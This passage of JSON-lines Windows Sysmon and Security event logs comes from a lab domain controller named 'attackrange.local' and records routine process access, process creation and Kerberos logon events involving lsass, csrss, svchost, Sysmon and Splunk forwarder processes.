C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.459","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-2001-5F25-0000-0010C9D80500}","TargetProcessId":"4596","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3899,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.459\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-2001-5F25-0000-0010C9D80500}\r\nTargetProcessId: 4596\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.459","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-2001-5F25-0000-0010C9D80500}","TargetProcessId":"4596","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220401,"ProcessID":864,"ThreadID":1104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x5DBCE\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x5dbce","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:55:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220402,"ProcessID":864,"ThreadID":1104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x5DBCE\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50092\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x5dbce","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50092","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:55:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3900,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.975\r\nProcessGuid: {41C8662E-2001-5F25-0000-001022DD0500}\r\nProcessId: 4400\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.975","ProcessGuid":"{41C8662E-2001-5F25-0000-001022DD0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3901,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.975\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010435B0500}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.975","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010435B0500}","TargetProcessId":"4400","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3902,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.975\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010435B0500}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.975","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010435B0500}","TargetProcessId":"4400","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3903,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3904,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
